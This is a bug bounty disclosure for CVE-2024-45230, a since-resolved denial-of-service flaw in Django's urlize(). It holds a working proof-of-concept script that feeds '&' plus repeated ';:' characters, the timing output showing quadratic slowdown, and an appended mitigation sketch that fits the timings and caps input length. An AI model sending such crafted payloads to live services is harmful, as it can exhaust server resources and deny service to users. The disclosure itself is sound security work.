CVE-2024-45230 - Potential denial-of-service in django.utils.html.urlize() (Another pattern)
Medium
Internet Bug Bounty
Team Summary
Official summary from Internet Bug Bounty
CVE-2024-45230: Potential denial-of-service vulnerability in django.utils.html.urlize(). urlize and urlizetrunc were subject to a potential denial-of-service attack via very large inputs with a specific sequence of characters.
Reported by
mprogrammer
Vulnerability Details
Technical details and impact analysis
This one is similar to https://hackerone.com/reports/2795558, but I found the DoS vulnerability by putting an ampersand character beside repeated `;:` characters.
This is the PoC that I used:
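```
import django.utils.html
from time import time

print("=== django.utils.html.urlize('&' + ';:' * n) ===")
# Grow the input in fixed steps and time each urlize() call.
for i in range(0, 600000, 40000):
    start = time()
    pattern = ';:'
    # One ampersand followed by i repetitions of ';:'
    PAYLOAD = '&' + pattern * i
    django.utils.html.urlize(PAYLOAD)
    print(len(PAYLOAD), "\t", time() - start)
# Keep the console open until Enter is pressed.
input("")
```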
```
=== django.utils.html.urlize('&' + ';:' * n) ===
2 0.0
80002 0.8933408260345459
160002 3.4347267150878906
240002 7.70803427696228
320002 14.04338812828064
400002 23.33271551132202
480002 34.01262950897217
560002 50.18527007102966
640002 66.2295835018158
720002 84.84082579612732
800002 105.49288773536682
880002 125.54152035713196
960002 155.80166292190552
1040002 187.27826762199402
```
## Impact
Reduced performance or Denial of Service was possible if `django.utils.html.urlize` was used without strict limits on a large user string.
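An added example, not part of the original report: fitting the PoC timings above to t = c * n^k shows roughly quadratic growth, and inverting the fit gives an input-length cap for a chosen time budget. The function names, the `length_capped` wrapper and the 0.1 s budget are assumptions for illustration; the timings come from the reporter's machine, so the resulting cap is indicative only.

```python
import math

# Timings copied from the report's PoC output: (input length, seconds).
# The first row (2, 0.0) is omitted because log(0) is undefined.
REPORTED = [
    (80002, 0.8933408260345459),
    (160002, 3.4347267150878906),
    (240002, 7.70803427696228),
    (320002, 14.04338812828064),
    (400002, 23.33271551132202),
    (480002, 34.01262950897217),
    (560002, 50.18527007102966),
    (640002, 66.2295835018158),
    (720002, 84.84082579612732),
    (800002, 105.49288773536682),
    (880002, 125.54152035713196),
    (960002, 155.80166292190552),
    (1040002, 187.27826762199402),
]

def fit_power_law(samples):
    """Least-squares fit of t = c * n**k in log-log space; returns (c, k)."""
    xs = [math.log(n) for n, _ in samples]
    ys = [math.log(t) for _, t in samples]
    mx, my = sum(xs) / len(xs), sum(ys) / len(ys)
    sxy = sum((x - mx) * (y - my) for x, y in zip(xs, ys))
    k = sxy / sum((x - mx) ** 2 for x in xs)
    return math.exp(my - k * mx), k

def max_len_for_budget(samples, budget_seconds):
    """Largest input length whose fitted worst-case time stays within budget."""
    c, k = fit_power_law(samples)
    return int((budget_seconds / c) ** (1 / k))

def length_capped(func, max_len):
    """Hypothetical guard: reject overlong text before calling func."""
    def wrapper(text, *args, **kwargs):
        if len(text) > max_len:
            raise ValueError(f"input of {len(text)} chars exceeds cap {max_len}")
        return func(text, *args, **kwargs)
    return wrapper

if __name__ == "__main__":
    c, k = fit_power_law(REPORTED)
    cap = max_len_for_budget(REPORTED, 0.1)  # 0.1 s budget is an assumed value
    print(f"fitted exponent k = {k:.2f}; cap for 0.1 s = {cap} chars")
```

With Django installed, the guard would be applied as `length_capped(django.utils.html.urlize, cap)`.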
Report Details
Additional information and metadata
State: Closed
Substate: Resolved
Bounty: $2162.00
Weakness: Allocation of Resources Without Limits or Throttling